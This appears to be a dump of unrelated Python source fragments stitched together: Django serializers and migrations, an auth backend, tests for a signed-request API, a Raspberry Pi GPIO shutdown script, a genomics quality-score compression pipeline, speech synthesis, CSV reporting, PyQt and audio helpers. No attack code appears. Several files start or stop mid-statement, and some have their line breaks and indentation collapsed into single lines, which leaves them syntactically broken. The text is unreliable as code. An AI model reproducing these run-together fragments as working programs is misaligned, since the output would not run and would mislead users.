            'email': self.validated_data.get('email', '')
        }

    def save(self, request):
        """Create and return the new user via the allauth adapter."""
        adapter = get_adapter()
        user = adapter.new_user(request)
        self.cleaned_data = self.get_cleaned_data()
        adapter.save_user(request, user, self)
        self.custom_signup(request, user)
        setup_user_email(request, user, [])
        return user


class VerifyEmailSerializer(serializers.Serializer):
    # ``key`` is the e-mail confirmation key issued by allauth.
    key = serializers.CharField()
#!/Users/shreyashirday/Personal/openmdao-0.13.0/bin/python
# EASY-INSTALL-SCRIPT: 'docutils==0.10','rst2odt_prepstyles.py'
# Auto-generated setuptools wrapper: resolves the pinned docutils
# distribution via pkg_resources and executes the rst2odt_prepstyles.py
# script shipped inside it.  Do not edit by hand; regenerated on install.
__requires__ = 'docutils==0.10'
__import__('pkg_resources').run_script('docutils==0.10', 'rst2odt_prepstyles.py')
#!/usr/bin/env python2.7
#
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

"""Module for all exceptions which search services may raise."""

from search.common import utils


class Error(Exception):
  """Generic error."""

  def _message(self):
    """Joins all exception args into one newline-separated string.

    Bug fix: the old code did "\n".join(self.args) directly, which raised
    TypeError whenever any arg was not a string (e.g. an int error code).
    """
    return "\n".join(str(arg) for arg in self.args)

  def ToString(self, error_prefix):
    """Builds error message string escaping it for HTML.

    Args:
      error_prefix: an error prefix.
    Returns:
      HTML escaped error message.
    """
    if error_prefix:
      return utils.HtmlEscape(
          "{0}: {1}".format(error_prefix, self._message()))
    else:
      return utils.HtmlEscape("Error: {0}".format(self._message()))

  def __str__(self):
    return self.ToString("Error")


class BadQueryException(Error):
  """BadQueryException error."""

  def __str__(self):
    return self.ToString("BadQueryException")


# Places search service pool exception.
class PoolConnectionException(Error):
  """PoolConnectionException error."""

  def __str__(self):
    return self.ToString("PoolConnectionException")


def main():
  pass


if __name__ == "__main__":
  main()
#! /usr/bin/env python
# coding: utf-8 -*-
"""Power the Raspberry Pi off when the configured GPIO input reads high.

Polls the pin every two seconds; on a high reading it appends one record
to the shutdown log and invokes the system shutdown command.
"""
import RPi.GPIO as GPIO
import time
import os

# config
# change the GPIO port number (BCM numbering)
gpioport = 24

LOGPATH = "/var/log/shutdown.log"

GPIO.setmode(GPIO.BCM)
# NOTE(review): no pull_up_down is configured, so a floating pin may read
# high spuriously — confirm the external wiring provides a defined level.
GPIO.setup(gpioport, GPIO.IN)


def sysshutdown(channel):
    """Log the shutdown trigger and halt the system.

    Args:
        channel: the GPIO channel that triggered the event; unused, but
            kept so the function also fits RPi.GPIO's event-callback
            signature.
    """
    # Bug fixes vs. the original:
    #  * timestamps were captured once at import time, so the log always
    #    showed the boot-time clock, not the shutdown time;
    #  * the variable named ``sdate`` actually held %H:%M:%S (a time) and
    #    ``stime`` held the date — the two were swapped;
    #  * the log file was written without a trailing newline, so records
    #    ran together, and it was never closed on the os.system path.
    date_stamp = time.strftime("%Y-%m-%d")
    time_stamp = time.strftime("%H:%M:%S")
    msg = "System shutdown GPIO.Low state"
    print("System shutdown")
    with open(LOGPATH, "a") as log_file:
        log_file.write("%s;%s;%s;\n" % (date_stamp, time_stamp, msg))
    os.system("shutdown -h now")


while True:
    if GPIO.input(gpioport):
        sysshutdown("1")
        break
    time.sleep(2)
d_dirs.append('original') options.compressed_dirs.append('goodbad') options.compressed_dirs.append('maxqual') options.compressed_dirs.append('minqual') for reads_filename in options.reads_filenames: # Copy the original sequences over. out_cmd("", std_err_file.name, ["cp", reads_filename, options.output_dir + '/original/' + os.path.basename(reads_filename)]) shutil.copyfile(reads_filename, options.output_dir + '/original/' + os.path.basename(reads_filename)) # Good/bad binary compression. call_arr = GB_COMPRESSION_CMD.replace('[READ]', reads_filename)\ .replace('[COMPRESSED_FILE]', options.output_dir + '/goodbad/' + os.path.basename(reads_filename) + '.comp').split() output_fp = open(options.output_dir + '/goodbad/' + os.path.basename(reads_filename), 'w') out_cmd(options.output_dir + '/goodbad/' + os.path.basename(reads_filename), std_err_file.name, call_arr) call(call_arr, stdout=output_fp, stderr=std_err_file) # Max/min quality value compression. We can use good_bad.py script to do this. call_arr = MAX_VALUE_COMPRESSION_CMD.replace('[READ]', reads_filename)\ .replace('[COMPRESSED_FILE]', options.output_dir + '/maxqual/' + os.path.basename(reads_filename) + '.comp')\ .replace('[MAX_QV]', options.max_quality).split() output_fp = open(options.output_dir + '/maxqual/' + os.path.basename(reads_filename), 'w') out_cmd(options.output_dir + '/maxqual/' + os.path.basename(reads_filename), std_err_file.name, call_arr) call(call_arr, stdout=output_fp, stderr=std_err_file) call_arr = MIN_VALUE_COMPRESSION_CMD.replace('[READ]', reads_filename)\ .replace('[COMPRESSED_FILE]', options.output_dir + '/minqual/' + os.path.basename(reads_filename) + '.comp').split() output_fp = open(options.output_dir + '/minqual/' + os.path.basename(reads_filename), 'w') out_cmd(options.output_dir + '/minqual/' + os.path.basename(reads_filename), std_err_file.name, call_arr) call(call_arr, stdout=output_fp, stderr=std_err_file) #continue # Polynomial regression. 
if options.poly_degrees: for degree in options.poly_degrees.split(','): ensure_dir(options.output_dir + '/degree_' + degree + '/') if 'degree_' + degree not in options.compressed_dirs: options.compressed_dirs.append('degree_' + degree) #continue call_arr = POLY_REGRESSION_CMD.replace('[READ]', reads_filename)\ .replace('[OUTPUT]', options.output_dir + '/degree_' + degree + '/' + os.path.basename(reads_filename))\ .replace('[DEGREE]', degree)\ .replace('[COMPRESSED_FILE]', options.output_dir + '/degree_' + degree +'/' + os.path.basename(reads_filename) + '.comp')\ .replace('[NUM_THREADS]', options.threads)\ .replace('[MAX_QV]', options.max_quality).split() out_cmd("", std_err_file.name, call_arr) call(call_arr, stderr=std_err_file) # Profile compression using k-means. if options.profile_sizes: for profiles in options.profile_sizes.split(','): ensure_dir(options.output_dir + '/profile_' + profiles + '/') if 'profile_' + profiles not in options.compressed_dirs: options.compressed_dirs.append('profile_' + profiles) #continue call_arr = PROFILE_COMPRESSION_CMD.replace('[READ]', reads_filename)\ .replace('[OUTPUT]', options.output_dir + '/profile_' + profiles + '/' + os.path.basename(reads_filename))\ .replace('[NUM_PROFILES]', profiles)\ .replace('[TRAINING_SIZE]', options.training_size)\ .replace('[COMPRESSED_FILE]', options.output_dir + '/profile_' + profiles +'/' + os.path.basename(reads_filename) + '.comp')\ .replace('[NUM_THREADS]', options.threads).split() out_cmd("", std_err_file.name, call_arr) call(call_arr, stderr=std_err_file) # Compress using QualComp. 
if options.rates: for rate in options.rates.split(','): #continue ensure_dir(options.output_dir + '/qualcomp_r' + rate + '/') if 'qualcomp_r' + rate not in options.compressed_dirs: options.compressed_dirs.append('qualcomp_r' + rate) #continue """ QUALCOMP_COMPRESS_CMD = "$QUALCOMP/runCompressMod.sh -i [READ] -c [CLUSTERS] -r [RATE]" QUALCOMP_DECOMPRESS_CMD = "$QUALCOMP/runDecompress.sh -p [DIR] -c [CLUSTERS] -r [RATE]" """ reads_abs_path = os.path.abspath(reads_filename) prev_dir = os.getcwd() os.chdir(os.environ["QUALCOMP"]) call_arr = QUALCOMP_COMPRESS_CMD.replace('[READ]', reads_abs_path)\ .replace('[CLUSTERS]', options.clusters)\ .replace('[RATE]', rate).split() out_cmd(std_err_file.name, std_err_file.name, call_arr) call(call_arr, stdout=std_err_file, stderr=std_err_file) # Also decompress using QualComp special function. qualcomp_prefix = reads_abs_path.split('.')[0] call_arr = QUALCOMP_DECOMPRESS_CMD.replace('[DIR]', qualcomp_prefix)\ .replace('[CLUSTERS]', options.clusters)\ .replace('[RATE]', rate).split() out_cmd(std_err_file.name, std_err_file.name, call_arr)
call(call_arr, stdout=std_err_file, stderr=std_err_file) os.chdir(prev_dir) # QualComp writes the files into the original directory, # so move the fastq files into the QualComp directory. mv_cmd = "mv " + qualcomp_prefix + "_" + options.clusters + "_" + rate + ".fastq " + options.output
_dir + '/qualcomp_r' + rate + '/' + os.path.basename(reads_filename) call_arr = mv_cmd.split() out_cmd("", std_err_file.name, call_arr) call(call_arr, stderr=std_err_file) filename_list = glob.glob(qualcomp_prefix + "_" + options.clusters + "_*") mv_cmd = "mv " + ' '.join(filename_list) + ' ' + options.output_dir + '/qualcomp_r' + rate + '/' call_arr = mv_cmd.split() out_cmd("", std_err_file.name, call_arr) call(call_arr, stderr=std_err_file) # Concatenate all the binary files to create a single 'compressed' file. filename_list = glob.glob(options.output_dir + '/qualcomp_r' + rate + '/' + os.path.basename(reads_filename).split(".")[0] + "*bin") cat_cmd = "cat " + ' '.join(filename_list) call_arr = cat_cmd.split() bin_file = open(options.output_dir + '/qualcomp_r' + rate + '/' + os.path.basename(reads_filename) + '.comp', 'w') out_cmd(bin_file.name, std_err_file.name, call_arr) call(call_arr, stdout=bin_file, stderr=std_err_file) # Compress using QualComp. if options.qvz_rates: for rate in options.qvz_rates.split(','): ensure_dir(options.output_dir + '/qvz_r' + rate + '/') if 'qvz_r' + rate not in options.compressed_dirs: options.compressed_dirs.append('qvz_r' + rate) """ QVZ_COMPRESS_CMD = "[QVZ]/qvz -c [CLUSTERS] -r [RATE] -v [READ] [OUTPUT]" QVZ_DECOMPRESS_CMD = "[QVZ]/qvz -x -v [INPUT] [OUTPUT]" """ # We first need to get the quality values only. TODO(cmhill): Very hacky. with open(reads_filename) as fin, open(options.output_dir + '/qvz_r' + rate + '/orig_' + os.path.basename(reads_filename) + '.quals', 'w') as
"""Prepare rendering of popular smart grid actions widget""" from apps.widgets.smartgrid import smartgrid def supply(request, page_nam
e): """Supply view_objects content, which are the popular actions from the smart grid game.""" _ = request num_results = 5 if page_name != "status" else None #contruct a dictionary containing the most popular tasks. #The keys are the type of the task and the values are a list of tasks.""" popular_tasks = { "Activity": smartgrid.get_popular_actions("activity", "approved", num_results), "Co
mmitment": smartgrid.get_popular_actions("commitment", "approved", num_results), "Event": smartgrid.get_popular_actions("event", "pending", num_results), "Excursion": smartgrid.get_popular_actions("excursion", "pending", num_results), } count = len(popular_tasks) return { "popular_tasks": popular_tasks, "no_carousel": page_name == "status", "range": count, }
# -*- coding: utf-8 -*-
# Generated by Django 1.11.28 on 2020-02-29 16:58
from __future__ import unicode_literals

import django.contrib.auth.validators
from django.db import migrations, models
import django.db.models.deletion


class Migration(migrations.Migration):
    """Adds optional pixel dimensions (``height``/``width``) to ``Attachment``."""

    dependencies = [
        ('sa_api_v2', '0004_django_19_updates'),
    ]

    operations = [
        migrations.AddField(
            model_name='attachment',
            name='height',
            # Nullable: existing rows (and attachments whose dimensions are
            # unknown) simply have no value.
            field=models.IntegerField(blank=True, null=True),
        ),
        migrations.AddField(
            model_name='attachment',
            name='width',
            field=models.IntegerField(blank=True, null=True),
        ),
    ]
"""Authentication and authorization.""" from haas.errors import AuthorizationError from haas import model from abc import ABCMeta, abstractmethod import sys _auth_backend = None class AuthBackend(object): """An authentication/authorization backend. Extensions which implement authentication/authorization backends should inherit from this class, and invoke ``set_auth_backend()`` on an instance of the subclass Subclasses of AuthBackend must override `authenticate`, `_have_admin`, and `_have_project_access`, and nothing else. Users of the AuthBackend must not invoke `_have_admin` and `_have_project_access`, preferring `have_admin` and `have_project_access`. """ __metaclass__ = ABCMeta @abstractmethod def authenticate(self
): ""
"Authenticate the api call, and prepare for later authorization checks. This method will be invoked inside of a flask request context, with ``haas.rest.local.db`` initialized to a valid database session. It is responsible for authenticating the request, and storing any data it will need later to determine whether the requested operation is authorized. The attribute ``haas.rest.local.auth`` is reserved for use by auth backends; A backend may store any information it needs as that attribute. This method must return a boolean indicating whether or not authentication was successful -- True if so, False if not. """ @abstractmethod def _have_admin(self): """Check if the request is authorized to act as an administrator. Return True if so, False if not. This will be called sometime after ``authenticate()``. """ @abstractmethod def _have_project_access(self, project): """Check if the request is authorized to act as the given project. Each backend must implement this method. The backend does not need to deal with the case where the authenticated user is an admin here; the `have_*` and `require_*` wrappers handle this. """ def have_admin(self): """Check if the request is authorized to act as an administrator. Return True if so, False if not. This will be caled sometime after ``authenticate()``. """ return self._have_admin() def have_project_access(self, project): """Check if the request is authorized to act as the given project. Return True if so, False if not. This will be caled sometime after ``authenticate()``. ``project`` will be a ``Project`` object, *not* the name of the project. Note that have_admin implies have_project_acccess. """ assert isinstance(project, model.Project) return self._have_admin() or self._have_project_access(project) def require_admin(self): """Ensure the request is authorized to act as an administrator. Raises an ``AuthorizationError`` on failure, instead of returning False. 
This is a convienence wrapper around ``have_admin``, and should not be overwritten by subclasses. """ if not self.have_admin(): raise AuthorizationError("This operation is administrator-only.") def require_project_access(self, project): """Like ``require_admin()``, but wraps ``have_project_access()``.""" if not self.have_project_access(project): raise AuthorizationError( "You do not have access to the required project.") def set_auth_backend(backend): """Set the authentication backend to ``backend``. This should be called exactly once, on startup, with an instance of ``AuthBackend`` as it's argument. """ global _auth_backend if _auth_backend is not None: sys.exit("Fatal Error: set_auth_backed() called twice. Make sure " "you don't have conflicting extensions loaded.") _auth_backend = backend def get_auth_backend(): """Return the current auth backend.""" return _auth_backend
""" Author: Seyed Hamidreza Mohammadi This file is part of the shamidreza/uniselection software. Please refer to the LICENSE provided alongside the software (which is GPL v2, http://www.gnu.org/licenses/gpl-2.0.html). This file includes the code for putting all the pieces together. """ from utils import * from extract_unit_info import * from search import * from generate_speech import * if __name__ == "__main__": if 0: # test pit2gci pit_file='/Users/hamid/Code/hts/HTS-demo_CMU-ARCTIC-SLT2/gen/qst001/ver1/2mix/2/alice01.lf0' target_gci = pit2gci(pit_file) if 1: # test read_dur,pit,for methods dur_file='/Users/hamid/Code/hts/HTS-demo_CMU-ARCTIC-SLT2/gen/qst001/ver1/2mix/2/alice01.dur' for_file='/Users/hamid/Code/hts/HTS-demo_CMU-ARCTIC-SLT2/gen/qst001/ver1/2mix/2/alice01.for' pit_file='/Users/hamid/Code/hts/HTS-demo_CMU-ARCTIC-SLT2/gen/qst001/ver1/2mix/2/alice01.lf0' #a=read_hts_for(for_file) #b=read_hts_pit(pit_file) #c=read_hts_dur(dur_file) fname = 'arctic_a0001' lab_name=corpus_path+'/lab/'+fname+'.lab' wav_name=corpus_path+'/wav/'+fname+'.wav' pm_name=corpus_path+'/pm/'+fname+'.pm' ##target_units = load_input(lab_name) #times, labs = read_lab(lab_name) ##tmp_units=extract_info(lab_name, wav_name, 0,0) times, pits, vox_times, vox_vals = read_hts_pit(pit_file) frm_time, frm_val = read_hts_for(for_file) gcis=pit2gci(times, pits, vox_times, vox_vals) tmp_units, times=read_input_lab(dur_file, pit_file) #tmp_units = tmp_units[128:140]## target_units = np.zeros(len(tmp_units), 'object') for j in xrange(len(tmp_units)): target_units[j] = tmp_units[j] if 0: units, fnames=load_units
() units = units[:int(units.shape[0]*(100.0/100.0))] best_units_indice=search(target_units, units,limit=20) best_units = units[best_units_indice] f=open('tmp2.pkl','w+') import pickle pickle.dump(best_units,f) pickle.dump(fnames,f) f.flush() f.close() else: f=open('tmp2.pkl','r') import pickle best_units=pickle.load(f) fnames=pickle.load(f) #best_units = best_units[128:140]##
f.close() for i in xrange(target_units.shape[0]): print target_units[i].phone, best_units[i].phone, best_units[i].unit_id #wavs=concatenate_units_overlap(best_units, fnames) #gcis = gcis[(gcis>times[128]) * (gcis<times[140])] #gcis -= times[128] ##$frm_time, frm_val = units2for(best_units, fnames, times, frm_time, frm_val) frm_time *= 16000.0 gcis=units2gci(best_units, fnames)##$ gcis = np.array(gcis) ##$gcis *= 16000 gcis = gcis.astype(np.uint32) old_times = np.array(times).copy() old_times *= 16000.0 times=units2dur(best_units, fnames)##$ times = np.array(times) ##$times *= 16000 times = times.astype(np.uint32) #times = times[128:141]## #aa=times[0]## #for i in range(len(times)):## #times[i] -= aa## #frm_time *= 16000 wavs=concatenate_units_psola_har_overlap(best_units, fnames, old_times, times, gcis, frm_time, frm_val, overlap=0.5) #wavs=concatenate_units_nooverlap(best_units, fnames) ftime, fval = get_formant(wavs, 16000) from scipy.io.wavfile import write as wwrite wwrite('out.wav', 16000, wavs) print 'successfully saved out.wav'
import os
import os.path

from raiden.constants import RAIDEN_DB_VERSION


def database_from_privatekey(base_dir, app_number):
    """Format a database path for the given app number under ``base_dir``.

    Builds ``<base_dir>/app<app_number>/v<RAIDEN_DB_VERSION>_log.db`` and
    creates the containing directory if needed.

    NOTE(review): despite the function name, no private key is used here —
    the path is derived only from ``base_dir`` and ``app_number``.

    :param base_dir: Root directory the per-app database folders live under.
    :param app_number: Index of the app instance; becomes the ``appN`` folder.
    :return: The full path to the database file.
    """
    dbpath = os.path.join(base_dir, f"app{app_number}", f"v{RAIDEN_DB_VERSION}_log.db")
    # exist_ok avoids a FileExistsError when the directory was already created
    # by an earlier call with the same app_number.
    os.makedirs(os.path.dirname(dbpath), exist_ok=True)

    return dbpath
=utf-8 from datetime import datetime, date, time from decimal import Decimal import json import django from django.forms import IntegerField from django.test import TransactionTestCase, Client from django.utils.functional import curry from django.utils.translation import ugettext_lazy import pytz from formapi.api import DjangoJSONEncoder from formapi.compat import smart_u, get_user_model from formapi.models import APIKey from formapi.utils import get_sign TOTAL_TESTS = 19 class SignedRequestTest(TransactionTestCase): def setUp(self): self.api_key = APIKey.objects.create(email="test@example.com") self.api_key_revoked = APIKey.objects.create(email="test3@example.com", revoked=True) self.client = Client() self.user = get_user_model().objects.create(email="user@example.com", username="räksmörgås") self.user.set_password("rosebud") self.user.save() self.authenticate_url = '/api/v1.0.0/user/authenticate/' self.language_url = '/api/v1.0.0/comp/lang/' def send_request(self, url, data, key=None, secret=None, req_method="POST"): if not key: key = self.api_key.key if not secret: secret = self.api_key.secret sign = get_sign(secret, **data) data['key'] = key data['sign'] = sign if req_method == 'POST': return self.client.post(url, data) elif req_method == 'GET': return self.client.get(url, data) def test_api_key(self): smart_u(self.api_key) def test_valid_auth(self): response = self.send_request(self.authenticate_url, {'username': self.user.username, 'password': 'rosebud'}) self.assertEqual(response.status_code, 200) response_data = json.loads(smart_u(response.content)) self.assertEqual(response_data['errors'], {}) self.assertTrue(response_data['success']) self.assertIsNotNone(response_data['data']) def test_invalid_call(self): response = self.send_request('/api/v1.0.0/math/subtract/', {'username': self.user.username, 'password': 'rosebud'}) self.assertEqual(response.status_code, 404) def test_unsigned_auth(self): data = {'username': self.user.username, 'password': 'rosebud'} 
response = self.client.post(self.authenticate_url, data) self.assertEqual(response.status_code, 401) def test_invalid_sign(self): data = {'username': self.user.username, 'password': 'rosebud'} sign = get_sign(self.api_key.secret, **data) data['key'] = self.api_key.key data['sign'] = sign + "bug" response = self.client.post(self.authenticate_url, data) self.assertEqual(response.status_code, 4
01) def test_invalid_password(self): data = {'username': self.user.username, 'password': '1337hax/x'} response = self.send_request(self.authenticate_url, data) self.assertEqual(response.status_code, 400) response_data = json.loads(smart_u(response.content)) self.assertGreater(len(response_data['errors']), 0) self.assertFalse(response_data['success']) self.assertFalse(response_data['data'
]) def test_invalid_parameters(self): data = {'email': self.user.email, 'password': 'rosebud'} response = self.send_request(self.authenticate_url, data) self.assertEqual(response.status_code, 401) def test_revoked_api_key(self): data = {'username': self.user.username, 'password': 'rosebud'} response = self.send_request(self.authenticate_url, data, self.api_key_revoked.key, self.api_key_revoked.secret) self.assertEqual(response.status_code, 401) def test_get_call(self): data = {'username': self.user.username, 'password': '1337haxx'} response = self.send_request(self.authenticate_url, data, req_method='GET') self.assertEqual(response.status_code, 200) def test_multiple_values(self): data = {'languages': ['python', 'java']} response = self.send_request(self.language_url, data, req_method='GET') self.assertEqual(response.status_code, 200) class HMACTest(TransactionTestCase): def setUp(self): self.api_key = APIKey.objects.create(email="test@example.com") def test_parameter_sign(self): # test unicode url_params = u'first_name=mårten&last_name=superkebab' dict_params = {'first_name': u'mårten', 'last_name': u'superkebab'} self.assert_equal_signs(url_params, dict_params) # test string url_params = 'first_name=mårten&last_name=superkebab' dict_params = {'first_name': 'mårten', 'last_name': 'superkebab'} self.assert_equal_signs(url_params, dict_params) # test integer url_params = u'dividend=4&divisor=2' dict_params = {'dividend': 4, 'divisor': 2} self.assert_equal_signs(url_params, dict_params) # test boolean url_params = u'secure=True' dict_params = {'secure': True} self.assert_equal_signs(url_params, dict_params) def assert_equal_signs(self, url_params, dict_params): sign1 = get_sign(self.api_key.secret, querystring=url_params) sign2 = get_sign(self.api_key.secret, **dict_params) self.assertEqual(sign1, sign2) class UnsignedRequestTest(TransactionTestCase): def setUp(self): self.client = Client() self.divide_url = '/api/v1.0.0/math/divide/' def test_ok_call(self): data = 
{'dividend': 7, 'divisor': 2} response = self.client.post(self.divide_url, data) self.assertEqual(response.status_code, 200) response_data = json.loads(smart_u(response.content)) self.assertEqual(response_data['data'], 3.5) def test_invalid_call(self): data = {'dividend': "a", 'divisor': 2} response = self.client.post(self.divide_url, data) self.assertEqual(response.status_code, 400) response_data = json.loads(smart_u(response.content)) dividend_error = response_data['errors']['dividend'] self.assertEqual(dividend_error[0], smart_u(IntegerField().error_messages['invalid'])) self.assertGreater(len(response_data['errors']), 0) self.assertFalse(response_data['success']) self.assertFalse(response_data['data']) def test_error_call(self): data = {'dividend': "42", 'divisor': 0} response = self.client.post(self.divide_url, data) response_data = json.loads(smart_u(response.content)) self.assertFalse(response_data['success']) class JSONEncoderTest(TransactionTestCase): def setUp(self): self.dumps = curry(json.dumps, cls=DjangoJSONEncoder) def test_datetime_encode(self): naive_micro_datetime = {'datetime': datetime.now(), 'int': 1} self.dumps(naive_micro_datetime) naive_second_datetime = {'datetime': datetime.now().strftime("%Y-%m-%d %H:%M:%S")} self.dumps(naive_second_datetime) tz_utc_datetime = {'datetime': datetime.now().replace(tzinfo=pytz.UTC)} self.dumps(tz_utc_datetime) datetime_date = {'datetime': date.today()} self.dumps(datetime_date) naive_datetime_time = {'datetime': time()} self.dumps(naive_datetime_time) naive_datetime_micro_time = {'datetime': time(microsecond=100)} self.dumps(naive_datetime_micro_time) def test_decimal_encode(self): decimal_data = {'decimal': Decimal("1.504")} self.dumps(decimal_data) def test_queryset(self): user_manager = get_user_model().objects user_manager.create(username="test", email="test@example.com") queryset = {'queryset': user_manager.all()} self.dumps(queryset) self.dumps(user_manager.all()) def test_values_list(self): if 
django.VERSION < (1, 9): user_manager = get_user_model().objects user_manager.create(username="test", email="test@example.com") values = user_manager.values('id', 'email') self.dumps(values) values_list = user_manager.values_list('id', flat=True) s
'''
20140213

Import CSV Data - Dict
Save as JSON?

Basic Stats
Save to file
Find Key Words
Generate Reports...
Generate Plots
'''
import csv

import numpy as np

# Default input file when run as a script.
filename = '20140211_ING.csv'


###____________ Helper ___________###

def number_fields(data):
    '''Return the names of the numeric (int/float) columns of a record array.'''
    dtypes = data.dtype
    return [str(name) for i, name in enumerate(data.dtype.names)
            if 'float' in str(dtypes[i]) or 'int' in str(dtypes[i])]


def string_fields(data):
    '''Return the names of the text (bytes) columns of a record array.'''
    dtypes = data.dtype
    return [str(name) for i, name in enumerate(data.dtype.names)
            if 'S' in str(dtypes[i])]


def count_vals(array):
    '''Count the non-NaN entries of a 1-D numeric array.'''
    array = np.asarray(array)
    return int(array.size - np.count_nonzero(np.isnan(array)))


def number_summary(data, num_fields):
    '''Build {field: {'Mean', '#Values', 'Max', 'Min'}} for the given numeric fields.

    Uses the NaN-aware numpy reductions so missing values are skipped.
    (scipy.stats.nanmean was removed from SciPy; np.nanmean is the
    drop-in replacement.)
    '''
    sum_dict = {}
    for field in num_fields:
        column = data[field]
        sum_dict[field] = {
            'Mean': np.nanmean(column),
            '#Values': count_vals(column),
            'Max': np.nanmax(column),
            'Min': np.nanmin(column),
        }
    return sum_dict


###________ reports _________###

def basic_report(filename):
    '''Print a summary (row/column counts and column dtypes) for a csv file.'''
    data = np.recfromcsv(filename)
    names = data.dtype.names
    dtypes = data.dtype
    print('--------------------')
    print('---- CSV REPORT ----')
    print('--------------------')
    print('')
    print('Filename: \t %s' % filename)
    print('')
    print('# records: \t %s' % len(data))
    print('# columns: \t %s' % len(names))
    print('')
    print('--------------------')
    print('- name - data type ')
    for i, name in enumerate(names):
        print('-- %s \t %s --' % (name, dtypes[i]))
    print('--------------------')


def numeric_report(filename):
    '''Print per-column stats (count/max/min/mean) for the numeric columns.'''
    data = np.recfromcsv(filename)
    fields = number_fields(data)
    d = number_summary(data, fields)
    print('------------------------')
    print('---- NUMERIC REPORT ----')
    print('------------------------')
    print('')
    print('Filename: \t %s' % filename)
    print('')
    print('--------------------')
    for i in fields:
        print('FIELD: \t\t %s' % i)
        print('#Values: \t %s' % d[i]['#Values'])
        print('Max: \t\t %s' % d[i]['Max'])
        print('Min: \t\t %s' % d[i]['Min'])
        print('Mean: \t\t %s' % round(d[i]['Mean'], 2))
        print('--------------------')
    print('')


###________ main _________###

def main(filename):
    '''Print the basic and numeric reports for *filename*.'''
    basic_report(filename)
    print("")
    numeric_report(filename)


if __name__ == '__main__':
    # Guarded so importing this module does not immediately read the csv.
    main(filename)
# -*- coding: utf-8 -*-
# Created By: Virgil Dupras
# Created On: 2009-09-19
# Copyright 2010 Hardcoded Software (http://www.hardcoded.net)
#
# This software is licensed under the "BSD" License as described in the "LICENSE" file,
# which should be included with this package. The terms are also available at
# http://www.hardcoded.net/licenses/bsd_license

from PyQt4.QtCore import SIGNAL, Qt
from PyQt4.QtGui import QWidget, QHeaderView

from fs_model import FSModel, IGNORE_BOX_NAME
from ui.ignore_box_ui import Ui_IgnoreBox


class IgnoreBoxModel(FSModel):
    # Tree model backed by the app's ignore box; refreshes itself whenever
    # the app emits ignoreBoxChanged().
    def __init__(self, app):
        FSModel.__init__(self, app, app.board.ignore_box, IGNORE_BOX_NAME)
        # Old-style PyQt4 signal connection.
        self.connect(self.app, SIGNAL('ignoreBoxChanged()'), self.ignoreBoxChanged)

    #--- Events
    def ignoreBoxChanged(self):
        # Model contents changed wholesale; reset so attached views reload.
        self.reset()


class IgnoreBox(QWidget, Ui_IgnoreBox):
    # Tool window showing the ignore box contents; selecting rows mirrors the
    # selection into the app's board items.
    def __init__(self, app):
        QWidget.__init__(self, None)
        self.app = app
        self.boxModel = IgnoreBoxModel(app)
        self._setupUi()
        # Track view selection after the UI (and selection model) exists.
        self.connect(self.browserView.selectionModel(), SIGNAL('selectionChanged(QItemSelection,QItemSelection)'), self.browserSelectionChanged)

    def _setupUi(self):
        # Build the designer-generated UI and tune the tree header columns.
        self.setupUi(self)
        self.setWindowFlags(Qt.Tool)
        self.browserView.setModel(self.boxModel)
        h = self.browserView.header()
        h.setResizeMode(QHeaderView.Fixed)
        # Column 1 fixed at 120px; column 0 stretches to fill the rest.
        h.resizeSection(1, 120)
        h.setResizeMode(0, QHeaderView.Stretch)

    #--- Events
    def browserSelectionChanged(self, selected, deselected):
        # Map selected view rows back to their underlying board items.
        selectedIndexes = self.browserView.selectionModel().selectedRows()
        nodes = [index.internalPointer() for index in selectedIndexes]
        items = [node.ref for node in nodes]
        self.app.selectBoardItems(items)
"""The WaveBlocks Project Compute the transformation to the eigen basis for wavefunction. @author: R. Bourquin @copyright: Copyright (C) 2012, 2016 R. Bourquin @license: Modified BSD License """ from WaveBlocksND import BlockFactory from WaveBlocksND import WaveFunction from WaveBlocksND import BasisTransformationWF def transform_wavefunction_to_eigen(iomin, iomout, blockidin=0, blockidout=0): """Compute the transformation to the eigenbasis for a wavefunction. Save the result back to a file. :param iomin: An :py:class:`IOManager: instance providing the simulation data. :param iomout: An :py:class:`IOManager: instance for saving the transformed data. :param blockidin: The data block from which the values are read. Default is `0`. :param blockidout: The data block to which the values are written. Default is `0`. """ parameters = iomin.load_parameters() # Number of time steps we saved timesteps = iomin.load_wavefunction_timegrid(blockid=blockidin) nrtimesteps = timestep
s.shape[0] iomout.add_wavefunction(parameters, timeslots=nrtimesteps, blockid=blockidout) # The grid on the domain grid = BlockFactory().create_grid(para
meters) # The potential used Potential = BlockFactory().create_potential(parameters) # Basis transformator BT = BasisTransformationWF(Potential) BT.set_grid(grid) # And two empty wavefunctions WF = WaveFunction(parameters) WF.set_grid(grid) # Iterate over all timesteps for i, step in enumerate(timesteps): print(" Compute eigentransform at timestep %d" % step) # Retrieve simulation data values = iomin.load_wavefunction(timestep=step, blockid=blockidin) values = [values[j, ...] for j in range(parameters["ncomponents"])] WF.set_values(values) # Project wavefunction values to eigenbasis BT.transform_to_eigen(WF) # Save the transformed values iomout.save_wavefunction(WF.get_values(), timestep=step, blockid=blockidout)
# NOTE(review): Python 2 module ('print' statements; parameter named 'async',
# which is a reserved word on Python 3.7+). Samples are unsigned 8-bit values
# (0..255) centered at 128.

# Optional sound/FFT dependencies; if any is missing, the whole module
# degrades to no-ops by clearing 'ossaudiodev'.
try:
    import ossaudiodev
except:
    print "ossaudiodev not installed"
    ossaudiodev = None
try:
    import FFT
except:
    print "FFT not installed"
    ossaudiodev = None
try:
    import Numeric
except:
    print "Numeric not installed"
    ossaudiodev = None

import struct, math, time, threading, copy

def add(s1, s2):
    # Mix two samples pointwise, clamped to the valid 0..255 range.
    return minmax([(v1 + v2) for (v1, v2) in zip(s1, s2)])

def minmax(vector):
    # Clamp every value into the unsigned 8-bit range 0..255.
    return [min(max(v,0),255) for v in vector]

def scale(sample, value):
    # Scale amplitude around the 128 midpoint, then clamp.
    return minmax([((s - 128) * value) + 128 for s in sample])

def sine(freqs, seconds, volume = 1.0, sample_rate = 8000.0):
    # Build a clamped 8-bit sine (or sum of sines) of the given duration.
    sample = [128] * int(sample_rate * seconds)
    if type(freqs) == type(0):
        freqs = [freqs]
    for freq in freqs:
        for n in range(len(sample)):
